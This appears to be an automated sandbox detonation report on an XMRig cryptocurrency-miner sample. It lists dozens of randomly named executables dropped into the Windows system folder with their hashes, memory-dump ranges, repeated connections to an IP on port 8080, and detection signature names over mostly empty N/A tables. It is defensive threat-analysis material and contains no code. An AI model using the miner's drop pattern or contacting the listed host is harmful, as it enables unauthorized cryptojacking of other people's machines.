C:\Windows\System\UsnVzlz.exe

C:\Windows\System\UsnVzlz.exe

C:\Windows\System\ahHItje.exe

C:\Windows\System\ahHItje.exe

C:\Windows\System\ERcsWIH.exe

C:\Windows\System\ERcsWIH.exe

C:\Windows\System\zeasiBB.exe

C:\Windows\System\zeasiBB.exe

C:\Windows\System\kqMZdVC.exe

C:\Windows\System\kqMZdVC.exe

C:\Windows\System\TfWkGTW.exe

C:\Windows\System\TfWkGTW.exe

C:\Windows\System\IjIgmtE.exe

C:\Windows\System\IjIgmtE.exe

C:\Windows\System\UoLGtGE.exe

C:\Windows\System\UoLGtGE.exe

C:\Windows\System\mHktTaL.exe

C:\Windows\System\mHktTaL.exe

C:\Windows\System\zTnqZpo.exe

C:\Windows\System\zTnqZpo.exe

C:\Windows\System\PJBYAjr.exe

C:\Windows\System\PJBYAjr.exe

C:\Windows\System\DIHiejy.exe

C:\Windows\System\DIHiejy.exe

C:\Windows\System\tEoGsaD.exe

C:\Windows\System\tEoGsaD.exe

C:\Windows\System\lMHnLgB.exe

C:\Windows\System\lMHnLgB.exe

C:\Windows\System\VvrmbSy.exe

C:\Windows\System\VvrmbSy.exe

C:\Windows\System\TfmQTNQ.exe

C:\Windows\System\TfmQTNQ.exe

C:\Windows\System\pSnGNdg.exe

C:\Windows\System\pSnGNdg.exe

C:\Windows\System\ZLnaFpR.exe

C:\Windows\System\ZLnaFpR.exe

C:\Windows\System\OnbjPVI.exe

C:\Windows\System\OnbjPVI.exe

C:\Windows\System\fKagMgi.exe

C:\Windows\System\fKagMgi.exe

C:\Windows\System\eKgeCHk.exe

C:\Windows\System\eKgeCHk.exe

C:\Windows\System\JXbWfjX.exe

C:\Windows\System\JXbWfjX.exe

C:\Windows\System\PKenPlp.exe

C:\Windows\System\PKenPlp.exe

C:\Windows\System\mjUunLU.exe

C:\Windows\System\mjUunLU.exe

C:\Windows\System\vbtSiuN.exe

C:\Windows\System\vbtSiuN.exe

C:\Windows\System\ayXmqfF.exe

C:\Windows\System\ayXmqfF.exe

C:\Windows\System\KOJGGwj.exe

C:\Windows\System\KOJGGwj.exe

C:\Windows\System\CuHlLuK.exe

C:\Windows\System\CuHlLuK.exe

C:\Windows\System\EoMuDMW.exe

C:\Windows\System\EoMuDMW.exe

C:\Windows\System\mSrlcuQ.exe

C:\Windows\System\mSrlcuQ.exe

C:\Windows\System\MqTiNpQ.exe

C:\Windows\System\MqTiNpQ.exe

C:\Windows\System\djPVMoV.exe

C:\Windows\System\djPVMoV.exe

C:\Windows\System\RMJqzPq.exe

C:\Windows\System\RMJqzPq.exe

C:\Windows\System\COBvdcB.exe

C:\Windows\System\COBvdcB.exe

C:\Windows\System\NVtiXHi.exe

C:\Windows\System\NVtiXHi.exe

C:\Windows\System\PsivTOr.exe

C:\Windows\System\PsivTOr.exe

C:\Windows\System\kFomrDN.exe

C:\Windows\System\kFomrDN.exe

C:\Windows\System\CLKIsKF.exe

C:\Windows\System\CLKIsKF.exe

C:\Windows\System\ypxxCJb.exe

C:\Windows\System\ypxxCJb.exe

C:\Windows\System\ftUvYuF.exe

C:\Windows\System\ftUvYuF.exe

C:\Windows\System\fZWoLcw.exe

C:\Windows\System\fZWoLcw.exe

C:\Windows\System\lzSZAjt.exe

C:\Windows\System\lzSZAjt.exe

C:\Windows\System\ZvgtwIj.exe

C:\Windows\System\ZvgtwIj.exe

C:\Windows\System\CPEDDmu.exe

C:\Windows\System\CPEDDmu.exe

C:\Windows\System\EktGLmr.exe

C:\Windows\System\EktGLmr.exe

C:\Windows\System\zPlIiWc.exe

C:\Windows\System\zPlIiWc.exe

C:\Windows\System\VCheWRf.exe

C:\Windows\System\VCheWRf.exe

C:\Windows\System\BznMcXM.exe

C:\Windows\System\BznMcXM.exe

C:\Windows\System\QCFVDUW.exe

C:\Windows\System\QCFVDUW.exe

C:\Windows\System\wcItCVN.exe

C:\Windows\System\wcItCVN.exe

C:\Windows\System\aWXrJnd.exe

C:\Windows\System\aWXrJnd.exe

C:\Windows\System\xOlGrzC.exe

C:\Windows\System\xOlGrzC.exe

C:\Windows\System\HtnPSVX.exe

C:\Windows\System\HtnPSVX.exe

C:\Windows\System\nkihRgg.exe

C:\Windows\System\nkihRgg.exe

C:\Windows\System\ongUvrl.exe

C:\Windows\System\ongUvrl.exe

C:\Windows\System\rQsLqwD.exe

C:\Windows\System\rQsLqwD.exe

C:\Windows\System\cxAHfND.exe

C:\Windows\System\cxAHfND.exe

C:\Windows\System\vIaFgLV.exe

C:\Windows\System\vIaFgLV.exe

C:\Windows\System\pKpxZgb.exe

C:\Windows\System\pKpxZgb.exe

C:\Windows\System\SAoXSFt.exe

C:\Windows\System\SAoXSFt.exe

C:\Windows\System\EmKMMSi.exe

C:\Windows\System\EmKMMSi.exe

C:\Windows\System\hnbbmbV.exe

C:\Windows\System\hnbbmbV.exe

C:\Windows\System\LVGvHEK.exe

C:\Windows\System\LVGvHEK.exe

C:\Windows\System\rbJObIJ.exe

C:\Windows\System\rbJObIJ.exe

C:\Windows\System\LqbNpnD.exe

C:\Windows\System\LqbNpnD.exe

C:\Windows\System\cBXXavm.exe

C:\Windows\System\cBXXavm.exe

C:\Windows\System\fdkUsrx.exe

C:\Windows\System\fdkUsrx.exe

C:\Windows\System\rntqWMF.exe

C:\Windows\System\rntqWMF.exe

C:\Windows\System\uydCRnQ.exe

C:\Windows\System\uydCRnQ.exe

C:\Windows\System\aAjaNzG.exe

C:\Windows\System\aAjaNzG.exe

C:\Windows\System\pvwIZhn.exe

C:\Windows\System\pvwIZhn.exe

C:\Windows\System\MgHGwQq.exe

C:\Windows\System\MgHGwQq.exe

C:\Windows\System\JwIciRf.exe

C:\Windows\System\JwIciRf.exe

C:\Windows\System\uvNwMdU.exe

C:\Windows\System\uvNwMdU.exe

C:\Windows\System\iRDAfBu.exe

C:\Windows\System\iRDAfBu.exe

C:\Windows\System\JLpwySU.exe

C:\Windows\System\JLpwySU.exe

C:\Windows\System\hOkwbfw.exe

C:\Windows\System\hOkwbfw.exe

Network

Country Destination Domain Proto
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp

Files

memory/2028-1-0x000000013F600000-0x000000013F9F6000-memory.dmp

memory/2028-0-0x00000000003F0000-0x0000000000400000-memory.dmp

\Windows\system\iawBxss.exe

MD5 99b166ee0632274cbf3c0119e81a1910
SHA1 c71c1b9b4d60859dbae8b65df987f0fc38c93852
SHA256 986adabddff5d3fa5e6e6392a5c72e6d643eecd9f7498bb8b90c38d94ca5f1e4
SHA512 5f4e1a62f4776c86c82da7236c5a8626c251263e72e9c7901b0f3fadd3c73423210b54592618c9ccc37f6a6814c5cd1628053127b9466821784c2065bec97a66

memory/2028-6-0x0000000002FE0000-0x00000000033D6000-memory.dmp

memory/2936-9-0x000000013F9A0000-0x000000013FD96000-memory.dmp

memory/2132-21-0x000007FEF5A8E000-0x000007FEF5A8F000-memory.dmp

\Windows\system\mdpHVaO.exe

MD5 f99a9706ea92873b4e5885e677347815
SHA1 7217cded3438911ee0a5a920448ae5a3f72195e7
SHA256 a64ead082564554a28b404e68ffdc206711f54a91c03314496447808083f7658
SHA512 8352d0b9c2824fb219c17f7cda2fcf0f03dfc23447e8a51925ae652d66bf7c52b6943234d0f7bf96d4578eb9c1723b9a26c6094a160442e3d033f4d2f55174db

memory/2132-20-0x0000000002DA0000-0x0000000002E20000-memory.dmp

memory/2660-19-0x000000013F710000-0x000000013FB06000-memory.dmp

memory/2028-18-0x0000000002FE0000-0x00000000033D6000-memory.dmp

C:\Windows\system\IMxQeDg.exe

MD5 8ec23ee66724877f3792c97bf9358eaa
SHA1 b0b944879842268c0f6f1b3b512947c3a538b252
SHA256 dc92958d00d19d9619f1ec498bdf0c3e2ca34b6d9ea473c09de39b431735d29e
SHA512 b7cacffc6e21aab2d46da4d70afd69b80cc9e9aa4214a25b380871ca416cb30c0b36dfce351b09883e43d2212b4beb7e8a05883adffce7e92e8e9590aad8e36b

memory/2132-23-0x000000001B780000-0x000000001BA62000-memory.dmp

\Windows\system\aoXmZlP.exe

MD5 eed969cdffc1b1e0e439a7f84117d0c9
SHA1 fa9cddd98bf7a82c69fd095b495e05dfdf4cb08a
SHA256 f14af48117de8e5fdef3da42a04a30d4ffba79efda602bf9bf64fc21667ed232
SHA512 1fc9b2ededae6968a0699049c9086b027105827b8ee85cd374677264f812d1447389a77cdbf9614598597757ac6477ae37a532b9ad59927539a1ab5aeb918d0d

C:\Windows\system\WfDaPnl.exe

MD5 d38e21da3960300083bfb96da9044b22
SHA1 17d9514bf9fdef1aca1258d0cbc7140ee5877028
SHA256 13be2fdff9c8d30911bbe8c13405be49dcfdae0a83d6135909fa718f537c967f
SHA512 1f3bf24b6e51a4cd4242091d0b4833df8b702e1c988d481ffa1cbad51665586221fa411ba64d5328ed025c65d640cb8d14b8c76351083b39a62ab60254e280c5

C:\Windows\system\vYwvYEh.exe

MD5 b98b6b2aa9a2e89f8232260f32a78b2e
SHA1 0fef05701d05253fc06ed0a719a8a6d53f30b158
SHA256 f45575aeb9c2af97fb74d8d8afa529e9a2e6117f1ebdf3b41c03d4b99b4d1b50
SHA512 05d9767eb5bcaad7d77fb5e0fc1ce4f29476bad977f58f0510a8a3493d273bbb9f922fdb6ab2c134a3422b2b001124cb00353deca05ba466f6862036d2a1cfd8

memory/2132-55-0x000007FEF57D0000-0x000007FEF616D000-memory.dmp

\Windows\system\pCqwNwX.exe

MD5 8c3a9c44328159c97865321d95dd2f99
SHA1 557054f83c43bf68777f3fad088897fd0d4326b9
SHA256 04f37bf52e42dcb22e827375f77c91da4bbb4a580a9adbccfc78326b364bfe00
SHA512 631d02be65d757aad101df3c31e275cd348b5f5a09f36d108626c0667dfd42f19e3cf3bd70b99c681e38213b13558dd4bc43b926d5582bcbb934ffeef4cf84fc

\Windows\system\cmSvGdc.exe

MD5 fec1ae92c4d778628a1344162445e06c
SHA1 54dab7a4b50bc98534fe4c7fd96c147f4b637c2b
SHA256 5cb5539dc3ebe4f1973fc692088aa8bfa1c04f073e1d50508ba7dd7b89d2d446
SHA512 7a01a9ac6a6e9b3a757d191d91eee09d10d9de43952d7ee603a9079252856633a0db1dfd60176051af1d5fd3dfecb1a66d916fb453002720bded2e3b6cffb196

C:\Windows\system\SHtzeCg.exe

MD5 231fb770fc7236a3f60ab582bd5d24a8
SHA1 be0d2ed1b6748ab10a3656e7b90d09fb8da41360
SHA256 3a2e60dbeb19d1ba95200b0bbd9a7755b0d620fa6d381a3c5ca68cfedaed0971
SHA512 128e32f8ed4c5e4b3a8b00296a9666230a079267228cf8f7eb091e75d27e5d66ba9591c7c63846f62ce503b852674c82bb7aa666391d181a5cad469f76021961

memory/2028-72-0x00000000035D0000-0x00000000039C6000-memory.dmp

memory/2640-73-0x000000013F530000-0x000000013F926000-memory.dmp

memory/2028-81-0x00000000035D0000-0x00000000039C6000-memory.dmp

memory/2864-80-0x000000013F820000-0x000000013FC16000-memory.dmp

memory/2028-79-0x00000000035D0000-0x00000000039C6000-memory.dmp

C:\Windows\system\MKyDVGE.exe

MD5 86cf2e3a0073ecf1a681549d4f83f94f
SHA1 98a63ee352df7d7e3cc93db42ae9efe0dbad1e13
SHA256 0e27546a3c72f72905cf48947b169ff494351ac7c2a90f4b51e712cb05ad52e0
SHA512 6125cf413365eabf8c6ef53a0771dd4b0f845b1cee8f37e863fe735df7ff511d733811517e918a97c9b322bcb9324f891ada13a2bf5c9a805f0f88eefd6930d1

\Windows\system\FymJLDi.exe

MD5 15824ccdfce24ef4314d4b9dc9306d1b
SHA1 3cf443613739e1f6095f8adf58ae7c25f1e6da83
SHA256 05ced1bb98166ed68b707befa612dca90a6200c4e28522bb3a0934468da3d94a
SHA512 64b71a721919ed15fa56f00d82d7d935714257c0909cf4957abf70627d6792903afd6baeefc9f0280c0d94510db5455cf10c6a62a4aae2f65e4d5a64d68326d2

memory/2028-91-0x000000013FF90000-0x0000000140386000-memory.dmp

C:\Windows\system\elxqewp.exe

MD5 f93fcff8c7e2f38433a9cd00a902231f
SHA1 e3ad1f91fbc09a0942046dbc84b0ebb1e25e4626
SHA256 164461413e83d15b9253de3d45365cbad81255b7010100ebc7ccb01bfb8e1b61
SHA512 d8c81709d58f1eabc80ee586b352677c72ab56616735067ba7ad0bdae8348d98ceb488dd0aa2c0d9ae16172f7c43c76ba01effc70b6cd36998838ed46853caa0

C:\Windows\system\AGTlwZP.exe

MD5 966fa66df34ad73a31f20ba6945e6ec2
SHA1 6af52532e71bc68163b5b494670448c8dfa9e860
SHA256 d0a8705c54d4ea82c650f047fcf438b0f9ed4f82c5f4890358c78ea2e6249aa4
SHA512 726ad6ddc853c47f541649871eaa798bb88f168d99b56ef4d5fe962a20369ee957e158b22c8a0af36776b8de9586b03d66d2ecd96de106ffbdc9a8a26fc4d6af

\Windows\system\ssfKygU.exe

MD5 04b9b2409eeffae153cdfe2cc1a3e2a1
SHA1 d9879fa6b75e86c8e1c687490bfa7ed0c601fa84
SHA256 c09c3b596326591b3b50b9f160e24f4099e3fec6fd02a7b3d88c6916962c79ab
SHA512 b5daa6664897de4dd04aebf26bdd332c119aad7c68db579f09900b8dddc597e10cda35427cf73bf59ecac3670b9754523bc1eea567e9118cf3759b9e27617ecb

C:\Windows\system\XBepHJA.exe

MD5 67d9f8e914e33cf783a570e3c2706e7c
SHA1 3fd6bfc6d8bb8c182b8bd838fbafca8a33db7a6c
SHA256 33fc987ac62fa42b298a213471628820f7a3029f603d9758754b61198e28df48
SHA512 579390c6bea4976873aae3e15f8f53aab25291bcb469889b1e23620b4452d3ffbc86394badc289ef42702812f28a319825b6b3c8c6ee80980aee3f6ed06f1cbc

\Windows\system\TMswONZ.exe

MD5 161c82edd0487ec26228972664a2e26b
SHA1 457efcddc881b01a57773ca265d3c252dea1c29e
SHA256 7a9262cfb4f125c3a7b975d495f621a2199bb3e754a0371cc6be7fa09886d067
SHA512 1f0e92c063f6d4bd49c3705af1171e9c28a9be8440429b135cc9319a29d7a68cc5ba83ebe6701bfce44077fd4b0514ec0b3a46a07582f4bdc7879cafec88bd60

\Windows\system\qwXBXvN.exe

MD5 a4edc0571e035e72edf788a320c55e2d
SHA1 9a6562dd7c52ec436d26a70c10f8e4bf18195918
SHA256 22b24a27d8ae27ae02e9550111b62f07614d9b3ed56bb7cc95099a25a0ba2b7e
SHA512 e36c6e4d19034107ec294ff9dce079d449e0482e62b4e83db3b798cf130e57241e90af484d372068a73e5cd1f65112fa4c25fb52107e0310f6b9c3c60fcb9fea

\Windows\system\KjwrZhi.exe

MD5 dff2650f637a18cefe5f76647ed18417
SHA1 5c57b88277e9677fc0f4fa29a1ae795b4c951114
SHA256 7ffdf9b40f1acde4cb1d38f8852cb36818e1ba78e6047831ac7d3a8302345818
SHA512 1af97501502485e376f72a3e7a8cab331006c1bf3b7ee6cbe2733409758ba4dd12b7fb3a8d9e644526f56035d02cdd90d22cc6f8b3e77e3004a03360f938d957

\Windows\system\hWMsrMp.exe

MD5 375d03c0839e29004383edaa7941101b
SHA1 f44732707d9a69bce901696f1f884fd152006ba5
SHA256 1ccd1a6bca73330350267c336a47fc66a7a2e027d26c9aeb2ba974414eec4672
SHA512 eb98b1050a82ad0742d00ee3e3682991dc063993068fa0d70c5b77b385552d7c22b73685f639084e056ed420c823f6f0a2b75307d698a44e89237f5b42d4f935

memory/2132-1057-0x000007FEF57D0000-0x000007FEF616D000-memory.dmp

memory/2028-1539-0x000000013F600000-0x000000013F9F6000-memory.dmp

memory/2660-2553-0x000000013F710000-0x000000013FB06000-memory.dmp

memory/2936-2545-0x000000013F9A0000-0x000000013FD96000-memory.dmp

memory/2028-2771-0x00000000035D0000-0x00000000039C6000-memory.dmp

\Windows\system\DpjydzP.exe

MD5 23aa854525ed782f158c836dbdfb3035
SHA1 0bbddf769b4658cf1fcfafdb7f7afb8e8bf3a2d4
SHA256 23636c9ced6206f4390e89ceb81b0d2ea2345fb85d7dcf0853cb3ff8dc139905
SHA512 1f2ca64a43cb0292e12176a85494eed0ef1692461bc5104166d00089522c0e78a95b4fcc49503385c07432c4424717a502b47a988f334afa96d35a448abbe7b1

\Windows\system\SbRwguE.exe

MD5 cca61d26861d8d22c1b2f28eab3f4b39
SHA1 49bc7596564d25830f52868c98013175ad0c60ef
SHA256 2ad202c8f220275a544ceec4351c1309b29b2edbba43c554f12699dfa785cb31
SHA512 dd693adddd69ea9fc0577cf8620ede83b2ca83350012a772bb210741cf2fab2e9757f87eaee5a0c89648f367ababc9474925f51a160815e72103679e3e1fbc28

\Windows\system\STEbEWe.exe

MD5 293d62914a1c3fbc65a34ad467609236
SHA1 bafff9856de18156a43b3f7d196ed5a294cd4a62
SHA256 de7349c1a6a4aa7bacf31557ef68aebb9a8e356be70d0a8e2ee3949280051295
SHA512 fb110163b4e21a23d6fe371d694979058431b4fa738efd6dafa209e481a9e79cd53bdf4b92f4052b12341eacf3a531d6efb40a771adc0d5edf85489c0ad131c1

\Windows\system\MGIOPBR.exe

MD5 d508df86c3d43e68011c7e663326567d
SHA1 b775ced6609a49a0b4d3c7d523b8c41d2947a624
SHA256 e5cd772173c4f8704fc5630e9f717f039d4474ec95c4dcd62e08ed00abaad2b4
SHA512 2052bd4a633ddd5d8d714ff5abc8c11b881c0b78bd1c0ba3f62c12124ce9a1e4bf7d7167da68d91d82ae4673602ba1f32a914105dde0a4d2fe3663333d6c0a2c

\Windows\system\OwyhNjg.exe

MD5 e83020ec2915fca935955218b2952e2e
SHA1 bd7e52723cb5649a48a713190a4be386396bba71
SHA256 2d9303c1275a4ab43d53d3389b940c0585616512facb3842ce01a15888f559fb
SHA512 55e2dd57748d6d9bf541a7eef8e85c11a3bd23a54e792dc585c73b56e2a5130795eac005557afbf441be2e2fb02d93b613ef26c6fa6fac155949c4e62d488cdb

C:\Windows\system\dpXuEkL.exe

MD5 0355fe71844b846395634af340872268
SHA1 b30faba695cb36ca359b45b26e79e9f4f609ca66
SHA256 43ded90ca2cd6631c2c35caebdd65c8f2deb84cd545929e021b0ccfcffc36b05
SHA512 5b319bad4439d002a2a274f0d8dba8c7d2193025445db2084648f2006a09c474fb2e6d56c64a095505435872d0624593dad221ae7a603e20b4a906780cf8db42

memory/1660-92-0x000000013FF90000-0x0000000140386000-memory.dmp

C:\Windows\system\KoguhDL.exe

MD5 027799467e47de81800b7d168603cd7d
SHA1 f4ee77c4fb535693e2a0bd6d9315a7eb3745165a
SHA256 20f7a60bddaa8fcf0fe480817ef13976f57e60ce51361ccb5a75f1d44832b48d
SHA512 7943bc0891dba4db4c671158a74bae7c27f11a5a8a0f0793b60e7ad1655bea0d1151db5f8be5a5ae83588f9f322c7324a7795c889751a22b930bdcbd866c1b8f

\Windows\system\QMvrexs.exe

MD5 1e4c12aedd8b6e397d8c25bae13ed318
SHA1 52a6ffb5a09e1f1b51a117ce737abecc7ff1fe42
SHA256 8263a3f69bbaf034b81f9b6769e9c444929ab100989d9c1704ef4f6f52c886f0
SHA512 be0e9716a50f2d834581e01817e4406321e51cbf87e508c3df5e2a4a8f4317d94b092a0005fdf9b29d4c1097ea0dedac68d51de7071fb7bfc5747c84183b2d03

C:\Windows\system\gAkrhtC.exe

MD5 b27e78e9fca87bca9377615b94afe0cc
SHA1 c6cd615f0da9bf28bdcb6f2e26bb0fc7e054cd47
SHA256 452ad39d8c6e9e79b9b61f14bf58532f43a6069ecef95fef6fcf8ba54f113c52
SHA512 5878b703a01c7e264caf0022244cb27e488ca56d8cb38f622502195aa2bc17348daf85e5599595b9a8a5cbf6b27aa76f24c15ed139e3177ef565c5a0c0384081

C:\Windows\system\qpIxbZk.exe

MD5 b2e43e1ef37e03840a648ca1e19e832b
SHA1 976ef97bdfc054172b0d6c3d1b3e8035482ccb0e
SHA256 9b6bb12b7a8a2cdbdf023c8ee084719ea2d6f654031792ae3bd483dfe98c3e47
SHA512 082e05208a48f32a7e57098635eaca9e93e32284adbe3ee510bb1abd3122dcc68cef9d4bffced6b93aec0ae106509e266b31ea957a21d7e397178ed167b68223

C:\Windows\system\iDiNEvG.exe

MD5 4d4c9890f7b444c63e765b9322c41b44
SHA1 f442e6572937ac652e3a8fd8df589773399bca8e
SHA256 3003f6ee6aa534c9e422d9b09e62d205ef55d48baa9e2e260baf47b28c2d75df
SHA512 513a0af394575087ed799b8afb1cab7ce5be9c4f6545587ac57ce781062a7c55989da18f4be3e5ce9feb3ddf5059c74e00816d3e58584066a85f21599829a9ec

C:\Windows\system\ubnHeig.exe

MD5 4f649b3bbcb1107bae017a4b859c56f1
SHA1 37d45616fc9ebffe1ac13c601a0a86dd9971d4dc
SHA256 c9261805669eedf5c593e9aba1dd10d8cb78c349d5e06b77cc2e4672ab120a64
SHA512 d08b5f99851b94a955d2226fcb92b1909c4dc0e4d72f7d9b4c7d78b497455d62ca8ae776d230385bed21956db0f00f15b4920a0500938d8217504839b84d2895

C:\Windows\system\tvtLwKN.exe

MD5 42bde477f8428fc1cbc1ca0d7dabd749
SHA1 1012efe260086c8bfa684540ca74a43356ff95ab
SHA256 0f30fefb60a1e7289df0071c9e6f8e373c1733e2bf7659a64aaf213945d29130
SHA512 1fcc6def127bd6b42038d016eb50182bafb45b029092da17ba198f877b2ebdc363507e1fd29c41278ce86e911c5a4ee7bdccdc92fdb3493b048cc49d40c454c8

C:\Windows\system\zsReYhU.exe

MD5 7f515868a2cddde469eb76534f3d455e
SHA1 0b4ee39099910654b3df1e98133cf59ca2da37c4
SHA256 859dd9926bd0610d7504bb3ab029cc3768dc258ece4377a057e276ae10435122
SHA512 2bbf64e4fed26812c431126a0864ded40c4ded9992e8ec9c45aa68bfe1fff036b043adb3fecafc8561741831644886ee52b72ccf88cc309f0aa957bbd8511b05

C:\Windows\system\LIvLElR.exe

MD5 3598901ec36c3f165ca02c0f9df6d92d
SHA1 88e3fc4dd4afcf2f4d1d4cfb0505a8ad6f526265
SHA256 39a6e920b2af458a516473e86c04b1f961ca733658d1141769d2b3f4b0c89a71
SHA512 dd8e1861ebd621fa593662d1dd782ca8193023aa55478c8f804ed215e2f726af4fd2c22a05a14017466af720871ecda1666c6d6d6e69236c508305f59277b259

C:\Windows\system\LywOsCg.exe

MD5 33b838a189789407ad94e7fc079ed063
SHA1 93957a137cc6610f7472296cff550caa69ae8494
SHA256 05563999c812cfb90e44831d0b863d4606e51c814eddc83f7c246a24a0e6babe
SHA512 1c5999c44753eeb3b657487645af1e50331adaa43177011049d1de2db3db9b9512cd4961a09f76bfe2ea87095640cb1b368e9dc3e6a112647e189ab12b64b150

memory/3068-90-0x000000013F9E0000-0x000000013FDD6000-memory.dmp

memory/2532-89-0x000000013F9A0000-0x000000013FD96000-memory.dmp

C:\Windows\system\sDXcMzj.exe

MD5 fcb62d55495effd1b4797e0cc0541c41
SHA1 c1df663b449f2de56c2131c29ded546231c2306e
SHA256 78ba75492e6520f6389d97d9411b22ffed68819058172198427358470481d8e6
SHA512 ed3a058d90217160847b6a1c66bcbef98cb70592625beef59e2e697aff26a2e740fb6bab7283fe0f25aebc4fc1445da099e82ca2a09b9af34282ff5a7c536843

memory/2028-87-0x00000000035D0000-0x00000000039C6000-memory.dmp

memory/1424-104-0x000000013FD50000-0x0000000140146000-memory.dmp

memory/2028-75-0x000000013FD90000-0x0000000140186000-memory.dmp

memory/2028-78-0x00000000035D0000-0x00000000039C6000-memory.dmp

memory/2472-77-0x000000013FD90000-0x0000000140186000-memory.dmp

memory/2492-71-0x000000013F690000-0x000000013FA86000-memory.dmp

memory/2132-64-0x000007FEF57D0000-0x000007FEF616D000-memory.dmp

memory/2744-63-0x000000013F700000-0x000000013FAF6000-memory.dmp

memory/2132-62-0x000007FEF57D0000-0x000007FEF616D000-memory.dmp

memory/2132-60-0x0000000002290000-0x0000000002298000-memory.dmp

memory/2028-69-0x00000000035D0000-0x00000000039C6000-memory.dmp

memory/2152-68-0x000000013F610000-0x000000013FA06000-memory.dmp

memory/2028-66-0x00000000035D0000-0x00000000039C6000-memory.dmp

C:\Windows\system\hUiYhNq.exe

MD5 ac30e08380de4c7f61e8ae109fd1b588
SHA1 6be07c5660d1900ce740e40d358487d2dc0fd6ca
SHA256 55699fd621cb77df6020c1f547d4c5b15d61d163913b7abb9e4a7afa277b8ec6
SHA512 6fd12d9cc552e7125742eecdcc50b17d7e8215827527f808fa5b18af85a1b5e8d17ff71ef43953895ad9d8480b584183d64600fd94983b321c7d2aeaa0109259

memory/1660-4010-0x000000013FF90000-0x0000000140386000-memory.dmp

memory/2492-6742-0x000000013F690000-0x000000013FA86000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-10 16:03

Reported

2024-06-10 16:06

Platform

win10v2004-20240508-en

Max time kernel

143s

Max time network

148s

Command Line

"C:\Users\Admin\AppData\Local\Temp\aef74033d259df049593377b8be21ed1ee88e2425881526c003df97557dcf0a0.exe"

Signatures

xmrig

miner xmrig

Detects executables containing URLs to raw contents of a Github gist

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

UPX dump on OEP (original entry point)

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
